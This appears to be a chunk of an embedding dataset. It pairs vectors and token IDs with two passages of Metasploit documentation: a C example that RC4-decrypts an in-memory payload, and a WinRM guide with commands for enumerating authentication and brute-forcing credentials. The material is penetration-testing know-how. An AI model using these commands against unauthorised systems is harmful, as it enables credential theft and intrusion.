-0.4358413815498352, 0.13119366765022278, -0.1354159712791443, 0.24429136514663696, -0.4529222846031189, -0.784305214881897, 0.2789844274520874, -0.9887324571609497, 3.946807384490967, 1.202734112739563, 0.7411817312240601, 0.8477953672409058, -0.06923048198223114, 0.5565723776817322, 0.8728615641593933, -0.914054811000824, 0.512360692024231, 0.13306348025798798, 0.679931104183197, 0.06380125880241394, 0.2109670490026474, 0.17539821565151215, -0.12884244322776794, 1.503319263458252, -0.41105273365974426, -0.047003891319036484, 0.0969514399766922, -0.4702414572238922, -0.6379988193511963, 0.18831942975521088, -0.5031076669692993, 0.7941442131996155, 0.24395489692687988, 0.024130942299962044, 0.1023922935128212, -0.5372838973999023, 0.15144754946231842, -0.344434916973114, 0.01578568108379841, -0.2960042953491211, 1.0559310913085938, -0.15905605256557465, -0.578757643699646, 0.377605676651001, -0.3040512502193451, -0.5812250971794128, -0.24101833999156952, 0.18943089246749878, 0.3204556107521057, -0.4898392856121063, -0.675675630569458, -0.10389576852321625, -0.43862512707710266, 1.330768346786499, -0.45291566848754883, 0.08777434378862381, 0.6018399596214294, -0.0896952897310257, -0.10845741629600525, -0.151849165558815, 0.3941112458705902, -0.43695399165153503, 0.025208329781889915, -0.07397862523794174, -0.6044074296951294, 0.3278801143169403, 0.4757857322692871, 0.2790642976760864, -0.4253544509410858, 0.5581684112548828, -0.0790686383843422, 0.21882401406764984, -0.47787439823150635, 0.266033798456192, -0.5098790526390076, 1.3267396688461304, -0.5540355443954468, -0.5867530107498169, -0.16672319173812866, -0.6570236682891846, -0.5192410349845886, -0.2909025251865387, 0.2033364474773407, 0.06436119973659515, -0.314460813999176, 0.3244873285293579, 0.30148690938949585, -0.5855392813682556, -0.41858914494514465, -0.34241989254951477, -0.272930383682251, -0.5519291758537292, 0.08049871027469635, 0.6494909524917603, -0.4898350238800049, -0.24643303453922272, -0.24555735290050507, 0.5335336327552795, 0.967642605304718, 0.4531885087490082, -0.47519251704216003, 0.09231922775506973, -0.2748112976551056 ]
[ 101, 6412, 2129, 2000, 21933, 3207, 2918, 21084, 2007, 18804, 13102, 4135, 4183, 1024, 1024, 7705, 1024, 1024, 21624, 10760, 18804, 13102, 4135, 4183, 1039, 21624, 2038, 2328, 1011, 1999, 2490, 2005, 2918, 21084, 17181, 1998, 21933, 4667, 1010, 2029, 2003, 7528, 2004, 2918, 21084, 1012, 1044, 1012, 3642, 2742, 1001, 2421, 1026, 3645, 1012, 1044, 1028, 1001, 2421, 1026, 5164, 1012, 1044, 1028, 1001, 2421, 1026, 2918, 21084, 1012, 1044, 1028, 1013, 1013, 1000, 7592, 2088, 1000, 12359, 2011, 10151, 1024, 1024, 3793, 1012, 4372, 16044, 1035, 2918, 21084, 1006, 1007, 1001, 9375, 2918, 21084, 3367, 2099, 1000, 12943, 15088, 2497, 2290, 2620, 2290, 2094, 24594, 2100, 2497, 2290, 4160, 1027, 1000, 20014, 2364, 1006, 1007, 1063, 20014, 2918, 21084, 3367, 20927, 2078, 1027, 2358, 20927, 2078, 1006, 2918, 21084, 3367, 2099, 1007, 1025, 6948, 6767, 3593, 6948, 8569, 2546, 1027, 7484, 8095, 10085, 1006, 19701, 1010, 2946, 11253, 1006, 20014, 1007, 1008, 2918, 21084, 3367, 20927, 2078, 1010, 2033, 2213, 1035, 10797, 1010, 3931, 1035, 15389, 1035, 3191, 26373, 1007, 1025, 2033, 5244, 3388, 1006, 6948, 8569, 2546, 1010, 1005, 1032, 1014, 1005, 1010, 2918, 21084, 3367, 20927, 2078, 1007, 1025, 2918, 21084, 3207, 16044, 1006, 6948, 8569, 2546, 1010, 2918, 21084, 3367, 2099, 1010, 2918, 21084, 3367, 20927, 2078, 1007, 1025, 4471, 8758, 1006, 19701, 1010, 1006, 25869, 1008, 1007, 6948, 8569, 2546, 1010, 1000, 2918, 21084, 3231, 1000, 1010, 16914, 1035, 7929, 1007, 1025, 2709, 1014, 1025, 1065, 2000, 4012, 22090, 1010, 2224, 2129, 2000, 2224, 18804, 13102, 4135, 4183, 1024, 1024, 7705, 1024, 1024, 21624, 1024, 1024, 3645, 2000, 4012, 22090, 1039, 3642, 102 ]
metasploit
128.txt
0
[CLS] how to decrypt rc4 with metasploit : : framework : : compilerthe metasploit c compiler has built - in support for rc4 encryption and decryption, which is implemented as the rc4. h header. code example # include < windows. h > # include < rc4. h > # define payloadsize 12 # define rc4key " 4asmkfslyhwxehnzw048cf1vh1aczyya " int main ( void ) { unsigned char payload [ ] = " \ xd8 \ xb0 \ xe9 \ x5a \ x89 \ xc2 \ xee \ x43 \ xb9 \ x30 \ xd0 \ x86 " ; int lpbufsize = sizeof ( int ) * payloadsize ; lpvoid lpbuf = virtualalloc ( null, lpbufsize, mem _ commit, 0x04 ) ; memset ( lpbuf,'\ 0 ', lpbufsize ) ; rc4 ( rc4key, payload, ( char * ) lpbuf, payloadsize ) ; messagebox ( null, ( char * ) lpbuf, " test ", mb _ ok ) ; return 0 ; } to compile, use metasploit : : framework : : compiler : : windows. compile _ c. [SEP]
[ 0.36760345101356506, -0.6222261786460876, -0.11434037983417511, 0.31927037239074707, -0.4949328899383545, -0.23841533064842224, -0.6182106137275696, 0.024035107344388962, -0.23837220668792725, 0.7023678421974182, 0.8604832291603088, -0.2292938381433487, -0.18566347658634186, -0.44083136320114136, -0.5896008014678955, 0.5472572445869446, 0.40121790766716003, -0.022483577951788902, -0.7762044072151184, 0.7082938551902771, 0.0795275941491127, 0.07444704324007034, -1.2399054765701294, -0.07417447119951248, -0.46494629979133606, 0.18927128612995148, -0.07639170438051224, -0.04776475951075554, 0.6103624701499939, 0.7350997924804688, -0.35035720467567444, 0.034519799053668976, 0.9053131937980652, -0.6437125205993652, -0.2594873905181885, -0.6492440104484558, 0.6789680123329163, 0.055069126188755035, -0.19968707859516144, -0.8051842451095581, 0.3143852949142456, 0.12582673132419586, -0.27691251039505005, -0.6131141185760498, -0.41276100277900696, -0.8182905316352844, -0.47693097591400146, 0.16439230740070343, 0.5212966203689575, 0.28916656970977783, -0.23053236305713654, 0.9463350176811218, 0.1699826568365097, -0.8702263832092285, 0.18235953152179718, 0.08434821665287018, -0.13951550424098969, 0.46934807300567627, -0.22668176889419556, -0.1861083209514618, -0.32692092657089233, -0.2529856264591217, -0.6881003379821777, -0.42588675022125244, -0.2713414430618286, 0.23322582244873047, -0.2859138548374176, 0.5243592262268066, 0.06795469671487808, -0.2802478075027466, 0.4519474506378174, 0.37126240134239197, -0.3734343647956848, -0.63124018907547, 0.1829715222120285, -0.31726840138435364, 0.769471287727356, 0.33161425590515137, -0.665104329586029, 0.746485710144043, -0.41173508763313293, -0.1214577779173851, -0.29434001445770264, -0.6501843333244324, 0.00045868661254644394, -1.386012315750122, 0.113866426050663, -0.6704909801483154, -0.81508868932724, -0.17141284048557281, -0.1345013678073883, 0.4234495759010315, -0.10466192662715912, 0.13042813539505005, 0.3186323046684265, 0.37782007455825806, -0.13542141020298004, 0.10260628908872604, -0.9051019549369812, -0.45161861181259155, -0.06601569056510925, 0.14795899391174316, -0.2628219723701477, 0.13440480828285217, 0.4697986841201782, 0.6929599642753601, 0.3628540635108948, 0.9519150853157043, -0.7153167128562927, -0.34070268273353577, 0.17373225092887878, -0.0897475853562355, -0.49080389738082886, -0.19530729949474335, 0.48492318391799927, 0.1566491276025772, 0.12076358497142792, 0.4801790714263916, 0.4934235215187073, -0.7480100989341736, 0.1756126880645752, -0.35853925347328186, 0.015217047184705734, -0.15751005709171295, -0.5139563679695129, -0.6847956776618958, 0.094839908182621, 0.36188066005706787, -0.816113293170929, -0.24202264845371246, -0.15495264530181885, -0.15219101309776306, -0.4034508168697357, 0.03642725944519043, -0.5538728833198547, 0.590392529964447, 0.06404857337474823, -0.1227259635925293, 0.7936490774154663, -0.07170350104570389, 0.15905462205410004, -0.30067092180252075, 0.3370128571987152, 0.9948787689208984, -0.09329056739807129, 0.8309692740440369, -0.16384956240653992, 0.5740737318992615, -0.8016796112060547, 0.20600450038909912, 0.20933324098587036, -0.7259650230407715, 0.2782871425151825, 0.33864229917526245, 0.9944081902503967, 0.19767673313617706, -0.9181073904037476, 0.8072202801704407, -0.4714536964893341, 0.28511956334114075, -0.04048188030719757, 0.056921422481536865, -0.014622533693909645, 0.11892681568861008, -0.5360909104347229, 0.21810726821422577, -0.948097825050354, -0.24948838353157043, -0.5723198652267456, -0.7037573456764221, 0.5572182536125183, -0.6083161234855652, 0.027422288432717323, 0.2108156979084015, 1.0004445314407349, 0.3200514018535614, 0.12715771794319153, 0.7251424193382263, 0.20402367413043976, 0.567130982875824, 0.44996681809425354, 0.18580321967601776, 0.28746625781059265, 1.0264228582382202, 0.04333091899752617, 0.13302767276763916, 0.1646810919046402, 0.4817764461040497, -0.9387724995613098, -0.022459212690591812, -0.11646877974271774, 0.7588136792182922, -0.21819020807743073, 0.36335325241088867, -0.5897853970527649, -0.09693453460931778, -1.7073725461959839, 0.09115829318761826, -0.3757898807525635, 0.08505445718765259, -0.1543007344007492, 0.514055609703064, -0.6627091765403748, 0.35304856300354004, -0.3928322494029999, -0.3944753408432007, 0.7132905125617981, 0.32516971230506897, 0.04257539287209511, -0.21886886656284332, 0.9046239852905273, -0.11490397155284882, -0.24118857085704803, 0.5142836570739746, 1.0719860792160034, 0.125569149851799, -0.5990626215934753, -0.2627025246620178, -0.03970435634255409, 0.16126775741577148, -0.5985649228096008, 1.0515609979629517, 0.5756505727767944, 0.04404168576002121, -0.5535690784454346, -0.6418929100036621, 0.41586196422576904, 0.6459531784057617, 0.8707681894302368, 0.5093241930007935, 0.3750247061252594, -0.19438886642456055, -0.018783606588840485, 0.38715946674346924, 0.5352878570556641, 0.2826646566390991, 0.956940233707428, 0.8246417045593262, -0.5475332140922546, 0.2824915051460266, -0.08232570439577103, 0.6703433990478516, -0.579330325126648, -0.3844379186630249, 0.9722640514373779, 0.11119529604911804, -0.29302656650543213, 0.03892844170331955, -0.5785104036331177, -0.2987413704395294, -0.2393651008605957, 0.6597357988357544, 0.7222416400909424, 0.25581297278404236, -0.4932042956352234, 0.01653585210442543, 0.4242115914821625, 0.29885047674179077, -0.8702006936073303, 0.5886558890342712, 0.5483447909355164, 0.42502984404563904, -0.35919108986854553, -0.4189063608646393, 0.3915058672428131, 1.1463792324066162, 1.3477425575256348, -0.7760913372039795, -0.11003818362951279, -0.517421543598175, 0.18806876242160797, -0.339488685131073, -0.7377386093139648, 0.0966908261179924, -0.6558692455291748, -0.039991263300180435, -0.015561365522444248, -0.7206509113311768, -0.25034913420677185, -0.8678780794143677, 0.8610578775405884, 0.18345744907855988, -0.29569706320762634, -0.013233019970357418, 0.3211393356323242, -0.9131433367729187, -0.8167763948440552, 0.2605413794517517, -0.34788960218429565, 0.08418691903352737, -0.39586523175239563, 0.7148029208183289, -0.18611924350261688, -0.3015780448913574, -0.08079076558351517, -1.2625254392623901, -0.10118861496448517, 0.4224032163619995, -0.7086732983589172, 0.4668945372104645, -0.5345520973205566, 0.6631929278373718, 0.3043263554573059, -0.1446523517370224, -0.2759562134742737, 0.5410985350608826, -0.32722973823547363, 0.08652704209089279, 0.2754262089729309, 0.24287378787994385, -0.8882524967193604, 1.169715166091919, 0.05890117585659027, 0.32514140009880066, -0.6689500212669373, 0.8072998523712158, 0.5084094405174255, 0.24097685515880585, -0.1916368156671524, -0.33626043796539307, -0.43277809023857117, 0.35498765110969543, 0.14716462790966034, -0.541731595993042, -0.4581221044063568, 1.0722508430480957, -0.28634071350097656, -0.44478973746299744, -0.06876567751169205, -0.09554460644721985, -0.6814456582069397, 0.3888932168483734, -0.34626615047454834, 0.3943443298339844, 0.13837331533432007, 0.9648823738098145, -0.31484490633010864, 0.8213828206062317, -0.36215847730636597, 0.25065749883651733, -0.24635405838489532, -0.13709469139575958, 0.4999448359012604, 0.06004568934440613, -0.3791455626487732, 0.14885947108268738, 0.21923188865184784, 0.5652803182601929, -0.03275727480649948, -0.6540073752403259, 0.3406442403793335, -0.2654534876346588, 0.0069913542829453945, 0.0779486820101738, 0.21987125277519226, 0.6479359269142151, -0.8124766945838928, 0.12760736048221588, 0.07952769845724106, -0.166361004114151, 0.25457513332366943, -0.36367562413215637, -0.9188324809074402, -0.11809801310300827, 0.0738741010427475, -0.49772483110427856, -0.5841334462165833, 1.7039703130722046, -0.05457001179456711, -0.3397084176540375, 0.591304361820221, -0.15022417902946472, -0.149591863155365, 0.6288764476776123, 0.08188681304454803, 0.3913024961948395, 0.8595991134643555, -0.2604442834854126, 0.09174323081970215, -0.9822777509689331, -0.43309688568115234, 0.2493555247783661, 0.30840960144996643, 0.30388468503952026, 0.6580702066421509, -0.5851454138755798, -0.7649922966957092, -0.2117096185684204, -0.2676360607147217, 0.023557528853416443, -0.28516885638237, -0.451884001493454, -0.2123216837644577, -0.570507824420929, -0.19808878004550934, -0.374887079000473, 0.16394415497779846, 0.6450037360191345, 0.6907001733779907, 0.3155043423175812, 0.2337576299905777, 0.7243903279304504, 0.8343565464019775, 0.5102253556251526, -0.4111067056655884, 0.6522542834281921, 0.02028907835483551, 0.7578228712081909, 0.03337039053440094, 0.9761723875999451, -0.058752864599227905, 0.8509100079536438, 0.22648762166500092, 0.5935065746307373, -0.4198586344718933, -0.15202076733112335, -0.5757452249526978, 0.3690158724784851, 0.14373047649860382, -0.1761290282011032, -0.6043250560760498, -0.6961012482643127, -0.11570262163877487, -0.2755294740200043, 0.11293971538543701, -0.15631672739982605, -0.11254214495420456, -0.28232520818710327, -0.40177083015441895, -0.0680447593331337, -0.00337995495647192, 0.05251220241189003, -0.594782292842865, -1.2933387756347656, -0.5318994522094727, 1.0637080669403076, 0.6705750823020935, 0.056849732995033264, 0.16819216310977936, -0.6986000537872314, 0.521994411945343, -0.6470688581466675, -0.27802735567092896, -0.41394177079200745, -0.16653341054916382, -0.36611124873161316, 0.9876042008399963, -0.5422099232673645, -0.04010352864861488, -0.16327686607837677, 0.35255175828933716, -0.21066159009933472, -0.20613963901996613, -0.4383801817893982, 0.10583847761154175, 0.3810867369174957, 0.2396632581949234, -0.45470234751701355, 0.3930733799934387, -0.01597307249903679, -0.09785140305757523, -0.37731051445007324, 0.2116827666759491, -1.1883066892623901, -0.4239809215068817, -0.08347727358341217, -0.010466158390045166, -0.00524591188877821, 1.5660032033920288, 0.03832414746284485, -0.27131229639053345, 0.7366073131561279, 0.5018983483314514, -0.42075470089912415, 0.06238705292344093, -0.7744562029838562, 0.9515213966369629, 0.23157860338687897, -0.4840451180934906, -0.18239569664001465, -1.005834937095642, 1.255139708518982, 0.2907523512840271, -0.8439834117889404, 0.12079097330570221, -0.736433744430542, 0.2582780718803406, -0.26149365305900574, 0.5371179580688477, 0.31561389565467834, 0.010888036340475082, 0.03268434479832649, 0.6113356351852417, -0.08746180683374405, -0.17960470914840698, -0.03416049852967262, 0.5091448426246643, -0.6994615197181702, 0.8047457337379456, 0.9851790070533752, 0.7572404742240906, 0.7213500142097473, -0.423086941242218, -0.48936599493026733, -0.03607318550348282, 0.18835705518722534, -0.226909801363945, 0.44936928153038025, -0.23474374413490295, 0.2774142026901245, -0.2721247375011444, 0.5154158473014832, -1.289358139038086, 0.00048297562170773745, 0.4014081656932831, 0.17082218825817108, 0.4780345857143402, -0.575964093208313, -0.6182973384857178, 0.548658549785614, 0.7728269100189209, -0.5413484573364258, 0.10104430466890335, 0.4416631758213043, -0.6455275416374207, 0.6608092188835144, 0.03231045603752136, -1.0244184732437134, -0.657439649105072, 0.21301878988742828, 0.41762515902519226, -0.04449228197336197, -1.1251550912857056, -1.0483077764511108, -1.3765325546264648, -0.48530662059783936, 0.7600654363632202, 0.19359458982944489, -1.2639963626861572, -0.6844351291656494, -0.009116600267589092, -0.17411985993385315, -0.39460238814353943, -0.5390475392341614, -0.6294639706611633, -0.4694528579711914, -0.11219395697116852, 0.9668380618095398, 0.009120846167206764, -0.0021703175734728575, -0.37259724736213684, 0.5427029132843018, 0.14874167740345, 1.1721107959747314, -0.6489807367324829, -0.47822341322898865, 0.12314752489328384, -0.034655969589948654, -0.4548923075199127, 0.4349861145019531, -1.2548010349273682, 0.5276952385902405, -0.01128531713038683, 0.45584267377853394, -0.5668752193450928, -0.08988974243402481, -0.31805354356765747, 0.67352294921875, 0.7778648734092712, -0.18446481227874756, -0.2618548274040222, 0.043611329048871994, 0.156061053276062, -0.2591828405857086, -0.4941512644290924, 0.08153311163187027, 0.09102756530046463, -0.48987746238708496, -0.848823606967926, 0.7204107046127319, 0.8651844263076782, 0.1786567121744156, -0.12573553621768951, -0.25566890835762024, 0.7564334869384766, -0.6001735329627991, 0.5496236085891724, 0.6729921102523804, -0.1483360081911087, -0.19532853364944458, -0.2662760615348816, 0.2076958417892456, 0.5682188868522644, -0.2546957731246948, 0.44947102665901184, 0.3237045407295227, 0.5096824765205383, -0.31210991740226746, -0.6003498435020447, -0.7801018953323364, -0.08893200755119324, 0.018570024520158768, 1.144736886024475, -0.6550844311714172, 0.5886501669883728, 0.14204762876033783, -0.6003677248954773, -0.16010402143001556, 0.3105398416519165, -0.3287311792373657, 0.3970986306667328, 0.37189459800720215, 0.8240582942962646, 0.5704784393310547, 0.5517778992652893, -0.29771363735198975, -0.4775301218032837, -0.4129391610622406, 0.9262228012084961, -0.3430785536766052, -0.026933077722787857, 0.24043412506580353, 0.2627240717411041, -0.3988831043243408, -0.3731060028076172, -1.2860900163650513, -0.2605580687522888, -0.5801423788070679, -0.516990065574646, -0.5175852179527283, -0.05306839197874069, -0.5726686716079712, 0.15292435884475708, 0.3604220449924469, 0.11962522566318512, -0.22616884112358093, 0.036846987903118134, 0.5239839553833008, -0.2970024049282074, 0.40890955924987793, 0.8151342272758484, -0.005264179781079292, -0.40281587839126587, -0.18109802901744843, 0.34862905740737915, 0.30866682529449463, 0.3255358040332794, 0.4525422155857086, 0.09718823432922363, 1.1281280517578125, 0.03865094482898712, -0.41638123989105225, 1.0263078212738037, -0.7573414444923401, 1.1628236770629883, 0.43204736709594727, -0.84382164478302, -0.6395092606544495, -0.002642156323418021, 0.0017605607863515615, -0.5024575591087341, 0.8773773312568665, 0.14124928414821625, -0.08888272196054459, 0.3492530286312103, 0.7087790369987488, -0.40065521001815796, -0.4664498269557953, 0.7993069887161255, -0.6945772171020508, -0.38728177547454834, -0.8370524048805237, -0.3957594633102417, 0.18842001259326935, -0.21247480809688568, -1.10425865650177, -0.10901322960853577, -0.9212098121643066, 0.0687456876039505, 0.6121940016746521, 0.15612012147903442, -0.27082276344299316, -0.07883091270923615, -0.9860913753509521, -0.35347530245780945, -0.32125774025917053, -0.31854790449142456, -0.8080467581748962, -0.9814198017120361, -0.10806652903556824, -0.5073341727256775, 0.33196553587913513, 0.6363615989685059, -0.6734721064567566, 0.22960694134235382, -0.7942326068878174, -0.043160028755664825, -0.33982640504837036, 0.05956169217824936, -0.10812018811702728, 1.0882545709609985, 0.05532331019639969, 0.2754696309566498, 0.2615845799446106, -0.020594531670212746, -0.1725577861070633, -0.1432640552520752, 0.3894283175468445, 0.3214302361011505, -0.14615489542484283, -0.8400500416755676, -0.5470706820487976, 0.22829695045948029, -0.6510564684867859, -0.14652962982654572, -0.5522936582565308, 0.6191592216491699, 0.2767906188964844, -0.37720686197280884, 0.23988066613674164, 0.6516565084457397, -0.6981966495513916, -0.3075892925262451, 0.35893094539642334, -0.32839614152908325, 0.2793658375740051, 0.30495941638946533, 0.08556120842695236, -0.6288614869117737, 0.3066120445728302, 0.49956271052360535, -0.14297251403331757, 0.28647691011428833, -0.549913763999939, 0.21869246661663055, -0.5278900265693665, 0.28250202536582947, 0.18296495079994202, 0.03731349855661392, -0.42621612548828125, 0.1852724254131317, 0.5270357131958008, 0.03678271546959877, -0.7568409442901611, 0.1517161726951599, -0.2990644872188568, -0.46358123421669006, -0.0917578935623169, -0.7220994234085083, 0.44692426919937134, -0.36647161841392517, -0.29880794882774353, 0.08513113856315613, -0.21295276284217834, -0.21147757768630981, 0.0168315339833498, -0.00532072689384222, 1.1295757293701172, 0.42862454056739807, 0.22350949048995972, 0.3387466073036194, -0.9690133929252625, -0.7079346179962158, -0.45393919944763184, 0.38761699199676514, -0.6525084376335144, -0.9380745887756348, 0.5848714113235474, 1.2602165937423706, -0.45306074619293213, 0.06605695933103561, -0.25189730525016785, -0.3060089647769928, 0.7442206740379333, 0.7105501890182495, -0.8315593600273132, 0.14689572155475616, -0.6984993815422058, 0.4637477397918701, -0.08158222585916519, 0.4097016751766205, 0.15656118094921112, 0.06802007555961609, -0.20684875547885895, 0.26224493980407715, -0.002044114749878645, 0.4651874601840973, 0.37991878390312195, -0.45457547903060913, 0.8286128640174866, 1.2747646570205688, 0.7094061374664307, 0.2908385097980499, -0.5142814517021179, 0.5767071843147278, 0.7312278151512146, 0.7940396070480347, 0.3443373143672943, -0.5433405637741089, 0.457064151763916, -0.35393181443214417, -0.6667928695678711, -0.13255493342876434, -0.5252798795700073, -0.28715065121650696, 0.4169537425041199, 0.15610718727111816, -0.06960882991552353, -0.4010056257247925, 0.3865397870540619, 0.15170657634735107, -0.37171173095703125, -0.24792048335075378, -0.15229129791259766, -0.5051388740539551, -0.1882881373167038, 0.9072452783584595, -0.3048481345176697, -0.2416388839483261, 0.08059030026197433, -0.06547470390796661, 1.1750292778015137, 0.9376034140586853, -1.1551514863967896, -0.08318383246660233, 0.7563912272453308, 0.41790691018104553, -0.2799002528190613, -0.11988602578639984, -0.01843254081904888, 0.042777154594659805, -0.25968030095100403, 0.3446914553642273, -0.12410438805818558, 0.6062874794006348, -0.31239524483680725, 0.004107838962227106, -0.38540196418762207, -0.15057595074176788, -0.010927998460829258, -0.6087200045585632, 0.11692637950181961, -0.09003754705190659, 0.044627174735069275, -0.6954055428504944, 0.4849783182144165, 0.01081275474280119, 0.010748490691184998, 0.6238001585006714, -0.3633757531642914, -0.21588434278964996, 0.9038994908332825, -0.29500824213027954, 0.322083443403244, 0.34470146894454956, 1.3789350986480713, 0.2343822717666626, 0.5754024982452393, 0.4582318663597107, -0.3110455870628357, 0.28036272525787354, 0.09149828553199768, -1.1343249082565308, -0.4266241192817688, -0.16496999561786652, 0.18942980468273163, 0.10630239546298981, -0.28557366132736206, -0.3269667625427246, 0.03446038439869881, 0.04743906855583191, 0.10386955738067627, -0.24862930178642273, 0.5961421728134155, -0.7932946681976318, -0.4687139093875885, 0.005508158355951309, 0.9588769674301147, 0.037584733217954636, 0.5783363580703735, -0.5377229452133179, -0.1933981478214264, -0.699162483215332, -0.586285412311554, -0.7282202243804932, 0.10922825336456299, -0.7271327972412109, 0.117405965924263, -0.8390803337097168, -0.2733106315135956, -0.34912601113319397, -0.04029204696416855, -0.3087955117225647, 0.09422678500413895, 0.9559535980224609, 0.6177454590797424, 0.4200247824192047, 0.3400714099407196, 0.011369024403393269, -0.2736980617046356, 0.05753261223435402, 0.26741042733192444, -0.4127216637134552, 1.0198887586593628, 0.5744611024856567, 0.7300087809562683, 0.6783166527748108, 0.24351006746292114, 0.0923018753528595, -0.5045227408409119, -0.24470946192741394, -0.6922702789306641, 0.3329908549785614, -0.3598395586013794, -1.2046022415161133, -0.03154028579592705, 0.913227379322052, 0.2796081602573395, -0.19769859313964844, -0.8486146926879883, -0.4456111192703247, -0.21026594936847687, 0.004905960988253355, -0.20159292221069336, -0.4195038676261902, -0.3491502106189728, -0.40502333641052246, 0.36913126707077026, -1.1798460483551025, 4.14481258392334, 0.894591748714447, 0.37396901845932007, 0.9901583790779114, 0.14354613423347473, 0.3939759135246277, 0.4085707664489746, -0.8473838567733765, 0.472371369600296, -0.23224250972270966, 0.3255743384361267, 0.08587472140789032, 0.6743291020393372, -0.3068016469478607, -0.030082091689109802, 1.0334672927856445, 0.1360292285680771, -0.1607099175453186, 0.26936644315719604, -0.5352843403816223, -0.5856724381446838, 0.6259636878967285, -0.25862541794776917, 0.7553158402442932, 0.28961843252182007, -0.04373842850327492, -0.3902698755264282, 0.5981029868125916, -0.13374847173690796, -0.103055939078331, -0.26138582825660706, -0.37548524141311646, 0.3406067192554474, -0.617047131061554, -0.9061576724052429, -0.07028574496507645, 0.13922443985939026, -0.267273873090744, -0.13780982792377472, 0.226563960313797, 0.11759135127067566, 0.10483896732330322, -0.6734472513198853, -0.44293951988220215, -0.3400372266769409, 1.1179008483886719, -0.16470971703529358, -0.12686657905578613, 1.130515456199646, -0.18299689888954163, -0.04568914696574211, -0.1254490464925766, 0.1339496672153473, 0.03542136028409004, -0.609610915184021, 0.3445083796977997, -0.6169467568397522, 0.3367299735546112, 0.23672443628311157, 0.08163037896156311, -0.5052585005760193, 0.15545324981212616, -0.6736317276954651, -0.16150881350040436, -0.4101907014846802, -0.17023183405399323, -0.20257717370986938, 0.3942450284957886, -0.45341864228248596, -0.22676555812358856, -0.024338116869330406, -0.5325803756713867, -0.9409514665603638, -0.41269463300704956, 0.34654587507247925, 0.023006489500403404, -0.059048786759376526, 0.3410169780254364, -0.0018726439448073506, -0.09688838571310043, 0.07327207922935486, 0.10096044093370438, -0.3539612293243408, -0.9121097922325134, 0.6376428604125977, 0.5394392609596252, -0.17894095182418823, -0.02543247863650322, -0.24892231822013855, 0.45929983258247375, 0.4218820035457611, 0.07578134536743164, -0.1510189026594162, 0.13125132024288177, 0.02444981224834919 ]
[ 101, 2129, 2000, 11703, 2854, 13876, 22110, 2549, 2007, 18804, 13102, 4135, 4183, 1024, 1024, 7705, 1024, 1024, 21624, 10760, 18804, 13102, 4135, 4183, 1039, 21624, 2038, 2328, 1011, 1999, 2490, 2005, 22110, 2549, 21999, 1998, 11703, 2854, 16790, 1010, 2029, 2003, 7528, 2004, 1996, 22110, 2549, 1012, 1044, 20346, 1012, 3642, 2742, 1001, 2421, 1026, 3645, 1012, 1044, 1028, 1001, 2421, 1026, 22110, 2549, 1012, 1044, 1028, 1001, 9375, 18093, 5332, 4371, 2260, 1001, 9375, 22110, 2549, 14839, 1000, 26424, 6491, 2243, 10343, 2135, 2232, 2860, 2595, 11106, 14191, 2860, 2692, 18139, 2278, 2546, 2487, 2615, 2232, 2487, 6305, 9096, 3148, 1000, 20014, 2364, 1006, 11675, 1007, 1063, 27121, 25869, 18093, 1031, 1033, 1027, 1000, 1032, 1060, 2094, 2620, 1032, 1060, 2497, 2692, 1032, 1060, 2063, 2683, 1032, 1060, 2629, 2050, 1032, 1060, 2620, 2683, 1032, 1060, 2278, 2475, 1032, 1060, 4402, 1032, 1060, 23777, 1032, 1060, 2497, 2683, 1032, 1060, 14142, 1032, 1060, 2094, 2692, 1032, 1060, 20842, 1000, 1025, 20014, 6948, 8569, 10343, 4697, 1027, 2946, 11253, 1006, 20014, 1007, 1008, 18093, 5332, 4371, 1025, 6948, 6767, 3593, 6948, 8569, 2546, 1027, 7484, 8095, 10085, 1006, 19701, 1010, 6948, 8569, 10343, 4697, 1010, 2033, 2213, 1035, 10797, 1010, 1014, 2595, 2692, 2549, 1007, 1025, 2033, 5244, 3388, 1006, 6948, 8569, 2546, 1010, 1005, 1032, 1014, 1005, 1010, 6948, 8569, 10343, 4697, 1007, 1025, 22110, 2549, 1006, 22110, 2549, 14839, 1010, 18093, 1010, 1006, 25869, 1008, 1007, 6948, 8569, 2546, 1010, 18093, 5332, 4371, 1007, 1025, 4471, 8758, 1006, 19701, 1010, 1006, 25869, 1008, 1007, 6948, 8569, 2546, 1010, 1000, 3231, 1000, 1010, 16914, 1035, 7929, 1007, 1025, 2709, 1014, 1025, 1065, 2000, 4012, 22090, 1010, 2224, 18804, 13102, 4135, 4183, 1024, 1024, 7705, 1024, 1024, 21624, 1024, 1024, 3645, 1012, 4012, 22090, 1035, 1039, 1012, 102 ]
metasploit
129.txt
0
[CLS] winrm workflowswindows remote management ( winrm ), is a way for clients to remotely manage windows computers. winrm is built on top of the simple object access protocol ( soap ) over http ( s ). there are two main ports for winrm : 5985 / tcp - http5986 / tcp - httpson older versions of windows such as windows 7 / windows server 2008 the following ports were used : 80 / tcp - http443 / tcp - httpsimportant : before running the chosen winrm metasploit module, first ensure that the rport and ssl values are configured correctly. either with the modern inline option support : use scanner / winrm / winrm _ auth _ methods run url run url or by manually setting options : use scanner / winrm / winrm _ auth _ methods set rhost 192. 168. 123. 139 set rport 5985 set ssl false run metasploit has support for multiple winrm modules, including : authentication enumerationverifying / bruteforcing credentialsrunning commands and opening sessionsthere are more modules than listed here, for the full list of modules run the search command within msfconsole : msf6 > search winrm lab environmentthe winrm modules work against windows instances which have winrm installed and configured. for a domain controller the allow remote server management through winrm policy will need be enabled. it is only possible to use winrm against accounts which are part of the remote management users group. winrm over https requires the creation of a server authenticating certificate, as well as enabling the transport mode : winrm quickconfig - transport : https authentication enumerationenumerate winrm authentication mechanisms : use scanner / winrm / winrm _ auth _ methods run url run url example : msf6 auxiliary ( scanner / winrm / winrm _ auth _ methods ) > run url [ + ] 192. 168. 123. 139 : 5985 : negotiate protocol supported [ + ] 192. 168. 123. 139 : 5985 : kerberos protocol supported [ * ] scanned 1 of 1 hosts ( 100 % complete ) [ * ] auxiliary module execution completed winrm bruteforcebrute - force host with known user and password list : use scanner / winrm / winrm _ login run url threads = 50 pass _ file =. / wordlist. txt brute - force credentials : use scanner
